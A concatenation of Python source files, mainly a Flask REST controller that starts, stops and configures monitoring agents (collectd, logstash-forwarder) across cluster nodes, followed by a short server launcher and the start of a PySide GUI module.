@dmon.route('/v2/overlord/aux/<auxComp>/<nodeFQDN>/configure') # TODO: deploy specific configuration on the specified node
@api.doc(params={'auxComp': 'Aux Component', 'nodeFQDN': 'Node FQDN'})
class AuxDeploySelectiveThread(Resource):
def post(self, auxComp, nodeFQDN):
auxList = ['collectd', 'lsf', 'jmx']
if auxComp not in auxList:
response = jsonify({'Status': 'No such aux component ' + auxComp})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Component %s not in supported list %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), auxComp, str(auxList))
return response
qAux = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qAux is None:
response = jsonify({'Status': 'Unknown node ' + nodeFQDN})
response.status_code = 404
app.logger.warning('[%s] : [WARN] Node %s not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeFQDN)
return response
if auxComp == 'collectd':
return 'collectd'
elif auxComp == 'lsf':
return 'lsf'
elif auxComp == 'jmx':
return 'jmx'
else:
return 'error'
@dmon.route('/v1/overlord/aux/<auxComp>/config')
@api.doc(params={'auxComp': 'Aux Component'})
class AuxConfigSelective(Resource):
def get(self, auxComp):
allowed = ['collectd', 'lsf']
if auxComp not in allowed:
response = jsonify({'Status': 'unrecognized aux component ' + auxComp})
response.status_code = 404
return response
if not os.path.isdir(cfgDir):
response = jsonify({'Error': 'Config dir not found !'})
response.status_code = 404
return response
if auxComp == 'collectd':
if not os.path.isfile(os.path.join(cfgDir, 'collectd.conf')):
response = jsonify({'Error': 'Config file not found !'})
response.status_code = 404
return response
try:
Cfgfile = open(os.path.join(cfgDir, 'collectd.conf'), 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
return response
if auxComp == 'lsf':
if not os.path.isfile(os.path.join(cfgDir, 'logstash-forwarder.conf')):
response = jsonify({'Error': 'Config file not found !'})
response.status_code = 404
return response
try:
Cfgfile = open(os.path.join(cfgDir, 'logstash-forwarder.conf'), 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
return response
return send_file(Cfgfile, mimetype='text/plain', as_attachment=True)
def put(self, auxComp): #todo remove or leave
return "Sets configuration of aux components use parameters (args) -unsafe"
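# /v1/overlord/aux/<auxComp>/start: bulk start over SSH; restarts collectd or logstash-forwarder on
# every node currently marked as Stopped.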
@dmon.route('/v1/overlord/aux/<auxComp>/start')
@api.doc(params={'auxComp': 'Aux Component'})
class AuxStartAll(Resource):
def post(self, auxComp): # TODO create function that can be reused for both start and stop of all components
auxList = ['collectd', 'lsf']
if auxComp not in auxList:
response = jsonify({'Status': 'No such aux component ' + auxComp})
response.status_code = 400
return response
if auxComp == "collectd":
qNCollectd = dbNodes.query.filter_by(nCollectdState='Stopped').all()
if not qNCollectd:
response = jsonify({'Status': 'No nodes in state Stopped!'})
response.status_code = 404
return response
nodeCollectdStopped = []
for i in qNCollectd:
node = []
node.append(i.nodeIP)
try:
serviceCtrl(node, i.nUser, i.nPass, 'collectd', 'start')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot start collectd with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
# response = jsonify({'Status':'Error Starting collectd on '+ i.nodeFQDN +'!'})
# response.status_code = 500 # todo check if return is required for collectd
# return response
CollectdNodes = {}
CollectdNodes['Node'] = i.nodeFQDN
CollectdNodes['IP'] = i.nodeIP
nodeCollectdStopped.append(CollectdNodes)
i.nCollectdState = 'Running'
response = jsonify({'Status': 'Collectd started', 'Nodes': nodeCollectdStopped})
response.status_code = 200
return response
if auxComp == "lsf":
qNLsf = dbNodes.query.filter_by(nLogstashForwState='Stopped').all()
if not qNLsf:
response = jsonify({'Status': 'No nodes in state Stopped!'})
response.status_code = 404
return response
nodeLsfStopped = []
for i in qNLsf:
node = []
node.append(i.nodeIP)
try:
serviceCtrl(node, i.nUser, i.nPass, 'logstash-forwarder', 'start')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot start lsf with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
# response = jsonify({'Status': 'Error Starting LSF on ' + i.nodeFQDN + '!'})
# response.status_code = 500 # todo check if return is required for collectd
# return response
LsfNodes = {}
LsfNodes['Node'] = i.nodeFQDN
LsfNodes['IP'] = i.nodeIP
nodeLsfStopped.append(LsfNodes)
i.nLogstashForwState = 'Running'
response = jsonify({'Status': 'LSF started', 'Nodes': nodeLsfStopped})
response.status_code = 200
return response
@dmon.route('/v1/overlord/aux/<auxComp>/stop') # auxCtrl(auxComp,'stop') #TODO revise from pysshCore and make it work!
@api.doc(params={'auxComp': 'Aux Component'})
class AuxStopAll(Resource):
def post(self, auxComp):
auxList = ['collectd', 'lsf']
if auxComp not in auxList:
response = jsonify({'Status': 'No such aux component ' + auxComp})
response.status_code = 400
return response
if auxComp == "collectd":
qNCollectd = dbNodes.query.filter_by(nCollectdState='Running').all()
if not qNCollectd:
response = jsonify({'Status': 'No nodes in Running state!'})
response.status_code = 404
return response
nodeCollectdRunning = []
for i in qNCollectd:
node = []
node.append(i.nodeIP)
try:
serviceCtrl(node, i.nUser, i.nPass, 'collectd', 'stop')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot stop collectd with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error Stopping collectd on ' + i.nodeFQDN + '!'})
response.status_code = 500
return response
CollectdNodes = {}
CollectdNodes['Node'] = i.nodeFQDN
CollectdNodes['IP'] = i.nodeIP
nodeCollectdRunning.append(CollectdNodes)
i.nCollectdState = 'Stopped'
response = jsonify({'Status': 'Collectd stopped', 'Nodes': nodeCollectdRunning})
response.status_code = 200
return response
if auxComp == "lsf":
qNLsf = dbNodes.query.filter_by(nLogstashForwState='Running').all()
if not qNLsf:
response = jsonify({'Status': 'No nodes in state Running!'})
response.status_code = 404
return response
nodeLsfRunning = []
for i in qNLsf:
node = []
node.append(i.nodeIP)
try:
serviceCtrl(node, i.nUser, i.nPass, 'logstash-forwarder', 'stop')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot stop lsf with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error Stopping LSF on ' + i.nodeFQDN + '!'})
response.status_code = 500
return response
LsfNodes = {}
LsfNodes['Node'] = i.nodeFQDN
LsfNodes['IP'] = i.nodeIP
nodeLsfRunning.append(LsfNodes)
i.nLogstashForwState = 'Stopped'
response = jsonify({'Status': 'LSF stopped', 'Nodes': nodeLsfRunning})
response.status_code = 200
return response
@dmon.route('/v1/overlord/aux/<auxComp>/<nodeFQDN>/start')
@api.doc(params={'auxComp': 'Aux Component', 'nodeFQDN': 'Node FQDN'})
class AuxStartSelective(Resource):
def post(self, auxComp, nodeFQDN):
auxList = ['collectd', 'lsf']
if auxComp not in auxList:
response = jsonify({'Status': 'No such aux component ' + auxComp})
response.status_code = 400
return response
qAux = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qAux is None:
response = jsonify({'Status': 'Unknown node ' + nodeFQDN})
response.status_code = 404
return response
node = []
node.append(qAux.nodeIP)
if auxComp == 'collectd':
if qAux.nCollectdState != 'None':
try:
serviceCtrl(node, qAux.nUser, qAux.nPass, 'collectd', 'restart')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot restart collectd with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error restarting collectd on ' + nodeFQDN + '!'})
response.status_code = 500
return response
response = jsonify({'Status': 'Collectd restarted on ' + nodeFQDN})
response.status_code = 200
return response
else:
response = jsonify({'Status': 'Need to deploy collectd first!'})
response.status_code = 403
return response
if auxComp == 'lsf':
if qAux.nLogstashForwState != 'None':
try:
serviceCtrl(node, qAux.nUser, qAux.nPass, 'logstash-forwarder', 'restart')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot restart lsf with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error restarting LSF on ' + nodeFQDN + '!'})
response.status_code = 500
return response
response = jsonify({'Status': 'LSF restarted on ' + nodeFQDN})
response.status_code = 200
return response
else:
response = jsonify({'Status': 'Need to deploy LSF first!'})
response.status_code = 403
return response
@dmon.route('/v1/overlord/aux/<auxComp>/<nodeFQDN>/stop')
@api.doc(params={'auxComp': 'Aux Component', 'nodeFQDN': 'Node FQDN'})
class AuxStopSelective(Resource):
def post(self, auxComp, nodeFQDN):
auxList = ['collectd', 'lsf']
if auxComp not in auxList:
response = jsonify({'Status': 'No such aux component ' + auxComp})
response.status_code = 400
return response
qAux = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qAux is None:
response = jsonify({'Status': 'Unknown node ' + nodeFQDN})
response.status_code = 404
return response
node = []
node.append(qAux.nodeIP)
if auxComp == 'collectd':
if qAux.nCollectdState == 'Running':
try:
serviceCtrl(node, qAux.nUser, qAux.nPass, 'collectd', 'stop')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot stop collectd with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error stopping collectd on ' + nodeFQDN + '!'})
response.status_code = 500
return response
qAux.nCollectdState = 'Stopped'
response = jsonify({'Status': 'Collectd stopped on ' + nodeFQDN})
response.status_code = 200
return response
else:
response = jsonify({'Status': 'No running Collectd instance found!'})
response.status_code = 403
return response
if auxComp == 'lsf':
if qAux.nLogstashForwState == 'Running':
try:
serviceCtrl(node, qAux.nUser, qAux.nPass, 'logstash-forwarder', 'stop')
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot stop lsf with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({'Status': 'Error stopping LSF on ' + nodeFQDN + '!'})
response.status_code = 500
return response
qAux.nLogstashForwState = 'Stopped'
response = jsonify({'Status': 'LSF stopped on ' + nodeFQDN})
response.status_code = 200
return response
else:
response = jsonify({'Status': 'No running LSF instance found!'})
response.status_code = 403
return response
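# /v2/overlord/aux/<auxComp>/<nodeFQDN>/start: per-node start through the dmon-agent REST endpoint
# (port 5222) instead of SSH. Example call, assuming the controller runs on port 5001 as in __main__:
#   curl -X POST http://<controller>:5001/v2/overlord/aux/collectd/<nodeFQDN>/start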
@dmon.route('/v2/overlord/aux/<auxComp>/<nodeFQDN>/start')
@api.doc(params={'auxComp': 'Aux Component', 'nodeFQDN': 'Node FQDN'})
class AuxStartSelectiveThreaded(Resource):
def post(self, auxComp, nodeFQDN):
auxList = ['collectd', 'lsf', 'jmx', 'all']
if auxComp not in auxList:
response = jsonify({'Status': 'No such aux component ' + auxComp})
response.status_code = 400
return response
qAux = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qAux is None:
response = jsonify({'Status': 'Node ' + nodeFQDN + ' not found!'})
response.status_code = 404
return response
node = []
node.append(qAux.nodeIP)
agentr = AgentResourceConstructor(node, '5222')
if auxComp == 'all':
resourceList = agentr.start()
else:
resourceList = agentr.startSelective(auxComp)
try:
r = requests.post(resourceList[0], timeout=DMON_TIMEOUT)
# data = r.text
except requests.exceptions.Timeout:
response = jsonify({'Status': 'Timeout',
'Message': 'Request timed out!'})
response.status_code = 408
return response
except requests.exceptions.ConnectionError:
response = jsonify({'Status': 'Error',
'Message': 'Connection Error!'})
response.status_code = 404
return response
if auxComp == 'collectd':
qAux.nCollectdState = 'Running'
elif auxComp == 'lsf':
qAux.nLogstashForwState = 'Running'
else:
qAux.nCollectdState = 'Running'
qAux.nLogstashForwState = 'Running'
response = jsonify({'Status': 'Success',
'Message': 'Component ' + auxComp + ' started!'})
response.status_code = 200
return response
@dmon.route('/v2/overlord/aux/<auxComp>/<nodeFQDN>/stop')
@api.doc(params={'auxComp': 'Aux Component', 'nodeFQDN': 'Node FQDN'})
class AuxStopSelectiveThreaded(Resource):
def post(self, auxComp, nodeFQDN):
auxList = ['collectd', 'lsf', 'jmx', 'all']
if auxComp not in auxList:
response = jsonify({'Status': 'No such aux component ' + auxComp})
response.status_code = 400
return response
qAux = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qAux is None:
response = jsonify({'Status': 'Node ' + nodeFQDN + ' not found!'})
response.status_code = 404
return response
node = []
node.append(qAux.nodeIP)
agentr = AgentResourceConstructor(node, '5222')
if auxComp == 'all':
resourceList = agentr.stop()
else:
resourceList = agentr.stopSelective(auxComp)
try:
r = requests.post(resourceList[0], timeout=DMON_TIMEOUT)
# data = r.text
except requests.exceptions.Timeout:
response = jsonify({'Status': 'Timeout',
'Message': 'Request timed out!'})
response.status_code = 408
return response
except requests.exceptions.ConnectionError:
response = jsonify({'Status': 'Error',
'Message': 'Connection Error!'})
response.status_code = 404
return response
if auxComp == 'collectd':
qAux.nCollectdState = 'Stopped'
elif auxComp == 'lsf':
qAux.nLogstashForwState = 'Stopped'
else:
qAux.nCollectdState = 'Stopped'
qAux.nLogstashForwState = 'Stopped'
response = jsonify({'Status': 'Success',
'Message': 'Component ' + auxComp + ' stopped!'})
response.status_code = 200
return response
# return "same as v1" # TODO: stop selected component
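# /v2/overlord/aux/<auxComp>/start: bulk start; fans the request out to the dmon-agent on every
# registered node in parallel.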
@dmon.route('/v2/overlord/aux/<auxComp>/start')
@api.doc(params={'auxComp': 'Aux Component'})
class AuxStartAllThreaded(Resource):
def post(self, auxComp):
auxList = ['collectd', 'lsf', 'jmx', 'all']
if auxComp not in auxList:
response = jsonify({'Status': 'No such aux component ' + auxComp})
response.status_code = 400
return response
qNodes = db.session.query(dbNodes.nodeIP).all()
if not qNodes:
response = jsonify({'Status': 'No nodes registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
nList = []
for n in qNodes:
nList.append(n[0])
agentr = AgentResourceConstructor(nList, '5222')
if auxComp == 'all':
resourceList = agentr.start()
else:
resourceList = agentr.startSelective(auxComp)
dmon = GreenletRequests(resourceList)
nodeRes = dmon.parallelPost(None)
# TODO: create parallel request response parse function
failedNodes = []
for n in nodeRes:
nodeIP = urlparse(n['Node'])
qNode = dbNodes.query.filter_by(nodeIP=nodeIP.hostname).first()
# print n['StatusCode']
if n['StatusCode'] != 200:
failedNodes.append({'NodeIP': str(nodeIP.hostname),
'Code': n['StatusCode']})
qNode.nCollectdState = 'unknown'
qNode.nLogstashForwState = 'unknown'
else:
qNode.nCollectdState = 'Running'
qNode.nLogstashForwState = 'Running'
response = jsonify({'Status': 'Running ' + auxComp,
'Message': 'Updated Status',
'Failed': failedNodes})
response.status_code = 200
dmon.reset()
return response
@dmon.route('/v2/overlord/aux/<auxComp>/stop')
@api.doc(params={'auxComp': 'Aux Component'})
class AuxStopAllThreaded(Resource):
def post(self, auxComp):
auxList = ['collectd', 'lsf', 'jmx', 'all']
if auxComp not in auxList:
response = jsonify({'Status': 'No such aux component supported: ' + auxComp})
response.status_code = 400
return response
qNodes = db.session.query(dbNodes.nodeIP).all()
if not qNodes:
response = jsonify({'Status': 'No nodes registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
nList = []
for n in qNodes:
nList.append(n[0])
agentr = AgentResourceConstructor(nList, '5222')
if auxComp == 'all':
resourceList = agentr.stop()
else:
resourceList = agentr.stopSelective(auxComp)
dmon = GreenletRequests(resourceList)
nodeRes = dmon.parallelPost(None)
# TODO: create parallel request response parse function
failedNodes = []
for n in nodeRes:
nodeIP = urlparse(n['Node'])
qNode = dbNodes.query.filter_by(nodeIP=nodeIP.hostname).first()
# print n['StatusCode']
if n['StatusCode'] != 200:
failedNodes.append({'NodeIP': str(nodeIP.hostname),
'Code': n['StatusCode']})
qNode.nCollectdState = 'unknown'
qNode.nLogstashForwState = 'unknown'
elif len(resourceList) == 1:
if auxComp == 'collectd':
qNode.nCollectdState = 'Stopped'
if auxComp == 'lsf':
qNode.nLogstashForwState = 'Stopped'
else:
qNode.nCollectdState = 'Stopped'
qNode.nLogstashForwState = 'Stopped'
response = jsonify({'Status': 'Stopped ' + auxComp,
'Message': 'Updated Status',
'Failed': failedNodes})
response.status_code = 200
dmon.reset()
return response
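# /v2/overlord/aux/<auxComp>/configure: pushes component configuration to the dmon-agent on every
# monitored node. For collectd the payload carries the polling interval, the assigned Logstash
# instance and UDP port plus role-specific settings (Cassandra, MongoDB); for lsf it carries the
# Logstash instance and Lumberjack port.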
@dmon.route('/v2/overlord/aux/<auxComp>/configure') #this is the correct one for configuring components
class AuxConfigureCompTreaded(Resource):
def post(self, auxComp):
auxList = ['collectd', 'lsf', 'jmx'] #TODO: add all, will need some concurrency on dmon-agent part
if auxComp not in auxList:
response = jsonify({'Status': 'No such aux component supported ' + auxComp})
response.status_code = 400
app.logger.warning('[%s] : [WARNING] Aux component %s not supported',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), auxComp)
return response
qNodes = db.session.query(dbNodes.nodeIP, dbNodes.nMonitored, dbNodes.nRoles).all()
nList = []
nRoles = []
for n in qNodes:
if not n[1]:
continue
nList.append(n[0])
nRoles.append(n[2])
if not nList:
response = jsonify({'Status': 'No monitored nodes found'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No monitored nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
uList = []
for r in nRoles:
uList.append(r.split(', '))
uniqueRoles = set(x for l in uList for x in l)
uniqueRolesList = list(uniqueRoles)
# TODO: add support for roles on a per-node basis, not a global unique list
app.logger.info('[%s] : [INFO] Unique roles %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(uniqueRolesList))
agentr = AgentResourceConstructor(nList, '5222')
qMetPer = dbMetPer.query.first()
if auxComp == 'collectd':
resFin = {}
resourceList = agentr.collectd()
for n in resourceList:
payload = {}
nIP = urlparse(n).hostname
qNodeSpec = dbNodes.query.filter_by(nodeIP=nIP).first() #TODO: unify db foreign keys in tables
qLSSpec = dbSCore.query.filter_by(hostIP=qNodeSpec.nLogstashInstance).first()
if qLSSpec is None:
response = jsonify({'Status': 'No logstash instance found'})
response.status_code = 404
app.logger.warning('[%s] : [WARNING] No Logstash instance found with IP %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(qNodeSpec.nLogstashInstance))
return response
payload['Interval'] = qMetPer.sysMet
payload['LogstashIP'] = qNodeSpec.nLogstashInstance
payload['UDPPort'] = str(qLSSpec.udpPort)
if 'cassandra' in uniqueRolesList:
payload['Cassandra'] = 1
else:
payload['Cassandra'] = 0
if 'mongodb' in uniqueRolesList:
qBDS = dbBDService.query.first()
if qBDS is None:
app.logger.warning('[%s] : [WARNING] MongoDB role found but no settings detected',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
pass
else:
payload['MongoDB'] = 1
payload['MongoHost'] = qBDS.mongoHost
payload['MongoDBPort'] = qBDS.mongoPort
payload['MongoDBUser'] = qBDS.mongoUser
payload['MongoDBPasswd'] = qBDS.mongoPswd
payload['MongoDBs'] = qBDS.mongoDBs
app.logger.info('[%s] : [INFO] MongoDB role found added settings to queue',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
resFin[n] = payload
if auxComp == 'lsf':
resFin = {}
resourceList = agentr.lsf()
for n in resourceList:
payload = {}
nIP = urlparse(n).hostname
qNodeSpec = dbNodes.query.filter_by(nodeIP=nIP).first() #TODO: same as for collectd remove duplicate code
qLSSpec = dbSCore.query.filter_by(hostIP=qNodeSpec.nLogstashInstance).first()
payload['LogstashIP'] = qNodeSpec.nLogstashInstance
payload['LumberjackPort'] = qLSSpec.inLumberPort
resFin[n] = payload
if auxComp == 'jmx':
response = jsonify({'Status': 'Deprecated', 'Message': 'Use GenericJMX'})
response.status_code = 200
return response
# if auxComp == 'all':
# resourceCollectd = agentr.collectd()
# resourceLSF = agentr.lsf()
app.logger.info('[%s] : [INFO] Resources with payload -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(resFin))
dmon = GreenletRequests(resFin)
nodeRes = dmon.parallelPost(None)
app.logger.info('[%s] : [INFO] Resources responses -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodeRes))
failedNodes = []
for n in nodeRes:
nodeIP = urlparse(n['Node'])
qNode = dbNodes.query.filter_by(nodeIP=nodeIP.hostname).first()
# print n['StatusCode']
if n['StatusCode'] != 200:
failedNodes.append({'NodeIP': str(nodeIP.hostname),
'Code': n['StatusCode']})
qNode.nCollectdState = 'unknown'
qNode.nLogstashForwState = 'unknown'
response = jsonify({'Status': 'Reconfigured ' + auxComp,
'Message': 'Updated Status',
'Failed': failedNodes})
response.status_code = 200
app.logger.info('[%s] : [INFO] Component %s reconfigure, failed %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(auxComp), str(failedNodes))
dmon.reset()
return response
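# /v1/overlord/aux/interval: GET returns the stored metrics polling intervals (System, YARN, Spark,
# Storm); PUT creates or updates them, falling back to defaults for missing fields.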
@dmon.route('/v1/overlord/aux/interval')
class AuxInterval(Resource):
def get(self):
qInterv = dbMetPer.query.first()
if qInterv is None:
response = jsonify({'Status': 'No metrics interval has been set'})
response.status_code = 404
app.logger.warning('[%s] : [WARNING] No metrics interval has been set',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
else:
response = jsonify({'System': qInterv.sysMet,
'YARN': qInterv.yarnMet,
'Spark': qInterv.sparkMet,
'Storm': qInterv.stormMet})
response.status_code = 200
app.logger.info('[%s] : [INFO] Returned metrics poll rate; System -> %s, YARN -> %s, Spark -> %s, Storm -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
qInterv.sysMet, qInterv.yarnMet, qInterv.sparkMet, qInterv.stormMet)
return response
@api.expect(resInterval)
def put(self):
if not request.json:
abort(400)
if 'Spark' not in request.json:
spark = '15'
else:
spark = request.json['Spark']
if 'Storm' not in request.json:
storm = '60'
else:
storm = request.json['Storm']
if 'YARN' not in request.json:
yarn = '15'
else:
yarn = request.json['YARN']
if 'System' not in request.json:
system = '15'
else:
system = request.json['System']
app.logger.info('[%s] : [INFO] Values; System -> %s, YARN -> %s, Spark -> %s, Storm -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), system, yarn, spark, storm)
qInterv = dbMetPer.query.first()
if qInterv is None:
upMet = dbMetPer(sysMet=system, yarnMet=yarn, stormMet=storm, sparkMet=spark)
db.session.add(upMet)
db.session.commit()
response = jsonify({'Status': 'Added metrics interval values'})
response.status_code = 201
app.logger.info('[%s] : [INFO] Added Metrics interval values',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
else:
if 'Spark' not in request.json:
app.logger.info('[%s] : [INFO] Spark not in request. Value unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
pass
else:
qInterv.sparkMet = spark
if 'Storm' not in request.json:
app.logger.info('[%s] : [INFO] Storm not in request. Value unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
pass
else:
qInterv.stormMet = storm
if 'YARN' not in request.json:
app.logger.info('[%s] : [INFO] YARN not in request. Value unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
pass
else:
qInterv.yarnMet = yarn
if 'System' not in request.json:
app.logger.info('[%s] : [INFO] System not in request. Value unchanged',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
pass
else:
qInterv.sysMet = system
db.session.commit()
response = jsonify({'Status': 'Updated metrics interval values'})
response.status_code = 200
app.logger.info('[%s] : [INFO] Updated Metrics interval values',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
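# Debug helpers under /vx/: reset the node status/monitored flags, return the ES master node port
# and report the DMON_TIMEOUT setting.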
@dmon.route('/vx/reset/<type>')
class DMONReset(Resource):
def post(self, type):
listP = ['status', 'monitored']
if type not in listP:
return "Not Supported"
qn = dbNodes.query.all()
for n in qn:
if type == 'status':
print str(n.nStatus)
n.nStatus = 0
print str(n.nStatus)
elif type == 'monitored':
print str(n.nMonitored)
n.nMonitored = 0
print str(n.nMonitored)
return "Done"
@dmon.route('/vx/test')
class WTF(Resource):
def get(self):
qESCore = dbESCore.query.filter_by(MasterNode=1).first()
return qESCore.nodePort
@dmon.route('/vx/timeout')
class CheckTimeout(Resource):
def get(self):
try:
timeOut = os.environ.get('DMON_TIMEOUT')
except Exception as inst:
response = jsonify({'Status': 'Error fetching env variable'})
response.status_code = 500
return response
response = jsonify({'Timeout': timeOut,
'Default': os.getenv('DMON_TIMEOUT', 5)})
response.status_code = 200
return response
"""
Custom error handling
"""
@app.errorhandler(403)
def forbidden(e):
response = jsonify({'error': 'forbidden'})
response.status_code = 403
return response
@app.errorhandler(404)
def page_not_found(e):
response = jsonify({'error': 'not found'})
response.status_code = 404
return response
@app.errorhandler(500)
def internal_server_error(e):
response = jsonify({'error': 'internal server error'})
response.status_code = 500
return response
@app.errorhandler(405)
def meth_not_allowed(e):
response = jsonify({'error': 'method not allowed'})
response.status_code = 405
return response
@api.errorhandler(400)
def bad_request(e):
response = jsonify({'error': 'bad request'})
response.status_code = 400
return response
@api.errorhandler(415)
def bad_mediatype(e):
response = jsonify({'error': 'unsupported media type'})
response.status_code = 415
return response
if __name__ == '__main__':
handler = RotatingFileHandler(logDir + '/dmon-controller.log', maxBytes=10000000, backupCount=5)
handler.setLevel(logging.INFO)
app.logger.addHandler(handler)
log = logging.getLogger('werkzeug')
log.setLevel(logging.DEBUG)
log.addHandler(handler)
#DB Initialization
# app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(baseDir, 'dmon.db')
# app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
# db.create_all()
if len(sys.argv) == 1:
app.run(port=5001, debug=True, threaded=True)
else:
app.run(host='0.0.0.0', port=8080, debug=True)
|
main.py
|
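# Entry point: monkey-patch thread support, then launch the PoolHub server in a background daemon thread.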
import threading
from .threads import threader
from .server.server import start_server
threader.monkey_patch_threads()
t = threading.Thread(name="PoolHub Server", target=start_server, daemon=True)
t.start()
|
gnpamp.py
|
#!/usr/bin/env python
# Copyright (C) 2012 Victor Semionov
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import os
import signal
import threading
import multiprocessing
import getopt
import re
from PySide import QtCore, QtGui
import model
import meta
import npamp
import unitconv
import mainwin
import outwin
old_excepthook = None
debug_mode = False
predef_attr_reprs = [("inf", "float(\"inf\")"), ("nan", "float(\"nan\")")]
predef_attrs = [(name, eval(value)) for (name, value) in predef_attr_reprs]
defaults = npamp.cfg.load_conf(npamp.params.__dict__, None)
def boot_excepthook(exc_type, value, traceback):
if debug_mode and old_excepthook:
old_excepthook(exc_type, value, traceback)
QtGui.QMessageBox.critical(None, "%s Error" % meta.app_name, str(value))
def init_app_dir():
try:
os.mkdir(npamp.app_dir)
except OSError:
pass
def repr_cfg(v):
return re.sub("<class '([^']+?)'>", "\\1", repr(v))
def file2conf(path):
conf = npamp.cfg.load_conf(defaults, path)
return conf
def conf2file(conf, path):
with open(path, "w") as fp:
